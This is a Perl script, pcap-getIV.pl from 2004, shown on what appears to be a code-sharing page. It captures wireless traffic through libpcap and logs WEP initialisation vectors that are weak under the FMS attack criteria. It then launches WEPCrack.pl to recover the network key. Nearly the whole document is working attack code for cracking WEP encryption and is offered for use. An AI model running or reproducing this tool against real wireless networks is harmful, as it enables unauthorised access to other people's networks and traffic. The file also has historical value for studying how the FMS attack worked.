📄 pcap-getiv.pl
字号:
#!/usr/bin/perl## pcap-getIV.pl # Anton T. Rager 10/05/2004## script to open pcapfile/device and watch for weak IVs. # Creates file "IVFile.log" with captured/processed IVs # that match weak criteria. This script replaces the 3+# yr old prism-getIV.pl script that relied on prismdump # and a braindamaged way of processing the prismdump captures.## Use WEPCrack.pl to crack key after collecting 60+ Weak IVs # for each keybyte in secret.## Features:# - auto detects prism2 DLTs and skips prism2 header info# - 10000 packet status messages with timestamp for progress indication# - works with interface configured for monitor_mode and libpcap.# - also works with saved pcap files or saved prismdump files.## Limitations: # - assumes all traffic is for same BSSID/WEP encrypted network (try filtering if otherwise)# - does not discard repeated IVs from multiple/same nodes (again - try filtering on source MAC to prevent)# - static setting for 40bit WEPuse Net::Pcap;use Term::ReadKey;# Non Buffered Output$|=1;# -------------------------- Begin Options ---------------------------------------# Static setting for WEP keysize with this capture#$bytesize = 5; # 5 for 40bit 13 for 104bit WEP# Debug output - print all observed IVs - not just weak ones#$debug=0;# Append to existing logfile#$append_log=1;# number of packets to automatically dump status#$statdump=10000;# threshold for weak IVs and WEPCrack launch - launch manual with "c" command#$crack_threshold=60;# Toggles for differing Weak IVs# "Magic" IVs follow (x, 255, y) format (from FMS paper) - most reliable # for cracking, but requires lots of WEP frames# Resolved IVs match basic resolved equations (from FMS paper) - less reliable# for cracking, but occur often# Dwepcrack IVs match h1kari's 2nd output byte weak IVs # (future option - see h1kari's paper)# $magic_iv=1;$resolved_iv=0;# Enter a single MAC address (bssid or source address) to limit IV collection # to specific network or host. With no filter, all frames are evaluated/recorded# #$filter="000102030405"; # bssid or specific source MAC# -------------------------- Options End Here ------------------------------------# Grab and process ARGS$argflag=0;if (substr(@ARGV[0],0,1) eq "-") { $argflag=1;} else { print("Error: must supply options\n"); &usage;}# -f file# -i int# -b bytesize# -w weak IV types (magic/resolved)# -F filter# -n new logfilewhile ($argflag eq 1) { if (@ARGV[0] eq "-f") { # pcap file $file=@ARGV[1]; shift(@ARGV); # remove option shift(@ARGV); # remove value } elsif (@ARGV[0] eq "-i") { # pcap interface $dev=@ARGV[1]; shift(@ARGV); # remove option shift(@ARGV); # remove value } elsif (@ARGV[0] eq "-F") { # MAC to include filter $filter=@ARGV[1]; shift(@ARGV); # remove option shift(@ARGV); # remove value } elsif (@ARGV[0] eq "-b") { # WEP Bytesize if (int(@ARGV[1])) { $bytesize=@ARGV[1]; } else { print("bytesize is not an integer, reverting to bytesize of $bytesize\n"); } shift(@ARGV); # remove option shift(@ARGV); # remove value } elsif (@ARGV[0] eq "-w") { # IV detection types - list with , as delimit $magic_iv=0; $resolved_iv=0; @IV_options=split("\,",@ARGV[1]); foreach $IV_list (@IV_options) { if ($IV_list eq "magic") { $magic_iv=1; } elsif ($IV_list eq "resolved") { $resolved_iv=1; } else { print("Invalid IV type $IV_List\n"); } } if (!$magic_iv && !$resolved_iv) { $magic_iv=1; } shift(@ARGV); # remove option shift(@ARGV); # remove value } elsif (@ARGV[0] eq "-n") { # create new logfile $append_log=0; shift(@ARGV); # remove option } elsif (@ARGV[0] eq "-h") { # usage &usage; } $argflag=0;if (substr(@ARGV[0],0,1) eq "-") { $argflag=1;} }#if (!$ARGV[0]) {# die("Usage: pcap device -- or pcap -f filename\n");#} elsif ($ARGV[0] eq "-f") {# $file=@ARGV[1];#} else {# $dev=@ARGV[0];#} # Graceful exit with flush on <ctrl>C$SIG{INT} = \&sigint_handler;if ($file) { $object=Net::Pcap::open_offline($file,\$err); print("Opening pcap file $file.....\n"); if (!$object) { die("Pcap Open Failed for file $file\n"); }} else { $object=Net::Pcap::open_live($dev,1510, 0, -1, \$err); print("Opening device $dev.....\n"); if (!$object) { die("Pcap Open Failed for device $dev\n"); }}$dlt=Net::Pcap::datalink($object);print("DLT = $dlt: ");if ($dlt eq 105) { print("DLT_IEEE802_11 (0byte Offset)\n"); $offset=0;} elsif ($dlt eq 119) { print("Prism2 Header (144byte Offset)\n"); $offset=144;} else { die("unsupported DLT type");}print("Assuming WEP key is $bytesize bytes (",$bytesize*8,"bits) long \n");print("\tthis determines how may keybytes deep to collect weak IVs\n");print("\tchange bytesize var or IVFile.log header if otherwise\n");print("\n");print("Status update at $statdump packets\n");if ($append_log && -f "IVFile.log") { # open for append and assume header is same bitsize print("Appending to existing logfile IVFile.log\n"); open(IVFile, ">>IVFile.log"); # todo: read existing file and update WeakIV counters} else { # open logfile and create header print("Creating new logfile IVFile.log\n"); open(IVFile, ">IVFile.log"); # Temp static header for 40/104 WEP - # need to change cracker to try both? print(IVFile "$bytesize\n");}# populate keycounter array with zero valuesfor ($x=0;$x<$bytesize;$x++) { $keycounter[$x]=0;}if ($filter) { print("Filtering on source MAC or BSSID of $filter\n");} else { print("No filters - evaluating all detected frames for weak IVs\n\t(mult APs will prob confuse cracker)\n");}print("IV Flags: Magic=$magic_iv, Resolved=$resolved_iv\n");$help = <<EOF;Interactive Commands:\th: Flash help\tf: Flush data to file\tn: Create new IVFile.log file\ts: Flash status summary\td: Toggle debug packet printing (1=All IVs/0=Only Weak IVs)\tc: Launch WEPCrack process on collected data\t^c: ExitEOFprint("Press \'h\' for interactive command help\n");$start_time=time();Net::Pcap::loop($object, -1, \&process_packet, $user_data);print("Exiting and flushing files\n");sub sigint_handler { # snipped from jwright if ($object) { Net::Pcap::close ($object); close(IVFile); print("Flushed open files\n"); exit(0); }}sub process_packet { my ($user_data, $header, $pkt) = @_; my($frame_type); my ($source_mac); my ($dest_mac); my ($bssid); my ($flags); my ($addr_1); my ($addr_2); my ($addr_3); my ($iv_field); my ($llc_head); my ($onebyte); my (@IVList); my ($y); my ($x); #print("packet len ", $header->{caplen}," : "); $frame_type = ord(substr($pkt, $offset,1)); if ($frame_type == 0x80) { # print packets if verbose flag #print("Beacon\n"); } elsif ($frame_type == 0x08) { $flags=ord(substr($pkt, $offset+1,1)); # extract dec value $addr_1=unpack('H*', substr($pkt,$offset+4,6)); # extract hex values $addr_2=unpack('H*', substr($pkt,$offset+10,6));# extract hex values $addr_3=unpack('H*', substr($pkt,$offset+16,6));# extract hex values $llc_head=unpack('H*',substr($pkt,$offset+24,5)); # either WEP IVs or LLC #print("Data\n"); if (($flags & 0x01) == 0x01) { # to DS $bssid=$addr_1; $source_mac=$addr_2; $dest_mac=$addr_3; } elsif (($flags & 0x02) == 0x02) { $bssid=$addr_2; $source_mac=$addr_3; $dest_mac=$addr_1; } if ($bssid eq $filter || $source_mac eq $filter || !$filter) { if (($flags & 0x40) == 0x40) { # WEP $iv_field=$llc_head; $y=0; for ($x=0; $x<4; $x++) { push(@IVList,substr($iv_field,$y, 2)); $y=$y+2; } $onebyte=substr($iv_field,$y,2); splice(@IVHist,0,1); push(@IVHist,hex(substr($iv_field,0, 6))); $wep_progress_counter++; $timestamp=time(); if ($wep_progress_counter == $statdump) { $total_frames = $total_frames + $wep_progress_counter; $pkt_ave=int($total_frames/($timestamp-$start_time)); if ($save_time && $timestamp-$save_time > 0) { $int_ave=int($statdump/($timestamp-$save_time)); } else { $int_ave=$pkt_ave; } print("Timestamp=$timestamp : $total_frames WEP frames seen (tot=$pkt_ave fps, last=$int_ave fps)\n\tWeak IV Keybyte Counters:\n\t"); for ($x=0;$x<$bytesize;$x++) { print(" $x=$keycounter[$x]"); } print("\n"); $wep_progress_counter=0; $save_time=$timestamp; } if ($debug) { print("WEP: bssid=$bssid, src=$source_mac IV $IVList[0]:$IVList[1]:$IVList[2] $IVList[3] - $onebyte\n"); } # -- [0] >2 < 16, [1] = 255 (Magic) # -- [0]+[1] =1 and [3] <=0x0a or [3] ==0xff (Low Generics?) # -- [0]+[1] <=0x0c and [3] >=0xf2 and [3] <=0xfe and and [3] !=0xfd (High Generics) if ($magic_iv && hex($IVList[0]) > 2 && (hex($IVList[0])-3) < $bytesize && hex($IVList[1]) eq 255) { $keybyte=(hex($IVList[0])-3); print("write: Magic IV bssid=$bssid source=$source_mac IV=$IVList[0]:$IVList[1]:$IVList[2]\-\>$onebyte (keybyte:",$keybyte ,") \n"); print(IVFile hex($IVList[0]), " ", hex($IVList[1]), " ", hex($IVList[2]), " ", hex($onebyte),"\n"); $keycounter[$keybyte]++; } elsif ($resolved_iv && ((hex($IVList[0]) + hex($IVList[1]) ) %256 eq 1 && (hex($IVList[2])+2) < $bytesize)) { $keybyte=(hex($IVList[2])+2); print("Low IV bssid=$bssid source=$source_mac IV=$IVList[0]:$IVList[1]:$IVList[2]\-\>$onebyte (keybyte:", $keybyte, ") \n"); print(IVFile hex($IVList[0]), " ", hex($IVList[1]), " ", hex($IVList[2]), " ", hex($onebyte), "\n"); $keycounter[$keybyte]++; } elsif ($resolved_iv && ((hex($IVList[0]) + hex($IVList[1]) ) %256) eq (254 - hex($IVList[2])) && (254 - hex($IVList[2])) < $bytesize) { $keybyte=(254 - hex($IVList[2])); print("High IV bssid=$bssid source=$source_mac IV=$IVList[0]:$IVList[1]:$IVList[2]\-\>$onebyte (keybyte:", $keybyte, ") \n"); print(IVFile hex($IVList[0]), " ", hex($IVList[1]), " ", hex($IVList[2]), " ", hex($onebyte), "\n"); $keycounter[$keybyte]++; } #print("Bssid: $bssid\n"); } else { # Check for IP LLC header -- if none, then may be lying firmware. Just note for now. if ($llc_head eq "aaaa030000" || $llc_head eq "aaaa190087" || $llc_head eq "aaaa31009c") { print("Cleartext\n") } else { print("No WEP flag, but fuzzycheck thinks WEP - you may weant to upgrade your prism firmware ($llc_head)\n"); # 0xAA - IP LLC # 0x42 ? # 0xf0 - NetBios # 0xE0 - IPX # $llc_head eq "aaaa190087" # $llc_head eq "aaaa31009c" } }} } else { } ReadMode('cbreak'); $key = ReadKey(.000001); ReadMode('normal'); if ($key) { if ($key eq "h") { print("-$help"); } elsif ($key eq "d") { $debug=$debug^1; print("-Debug = $debug\n"); } elsif ($key eq "f") { select((select(IVFile), $| =1) [0]); print("-Flushed open files\n"); } elsif ($key eq "n") { close(IVFile); # open logfile and create header print("Creating new logfile IVFile.log\n"); open(IVFile, ">IVFile.log"); # Temp static header for 40/104 WEP - # need to change cracker to try both? print(IVFile "$bytesize\n"); } elsif ($key eq "s") { $timestamp=time(); $total_frames = $total_frames + $wep_progress_counter; $pkt_ave=int($total_frames/($timestamp-$start_time)); print("-Stats: Timestamp=$timestamp : $total_frames WEP frames seen ($pkt_ave fps)\n\tWeak IV Keybyte Counters:\n\t"); for ($x=0;$x<$bytesize;$x++) { print(" $x=$keycounter[$x]"); } print("\n"); } elsif ($key eq "c" || $key eq "C") { $crack_warn=0; if ($key eq "c") { print("-Checking IV stats\n"); for ($x=0;$x<$bytesize;$x++) { if ($keycounter[$x] < $crack_threshold) { $crack_warn=1; print("\tWe only have $keycounter[$x] weak IVs for Keybyte $x and threshold is $crack_threshold\n"); } } } if ($crack_warn=0 || $key eq "C") { Net::Pcap::close ($object); select((select(IVFile), $| =1) [0]); print("-Flushed open files\n"); print("--Calling ./WEPCrack.pl\n\n"); exec("./WEPCrack.pl"); } else { print("Try \"C\" if you really want to crack with too few weak IVs\n"); } } }}sub usage {die("pcap-getIV.pl [-i interface/-f pcapfile] (options)\t-f pcap filename\t-i pcap interface\t-w weak IV type list (\"magic\", \"resolved\" or \"magic,resolved\" for both)\t-F include source/BSSID filter (hex MAC - ie \"010203ffffff\")\t-b WEP Bytesize (defaults to 5 - 5=40bit, 13=104bit)\t-n create new logfile (default is append to existing)");}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -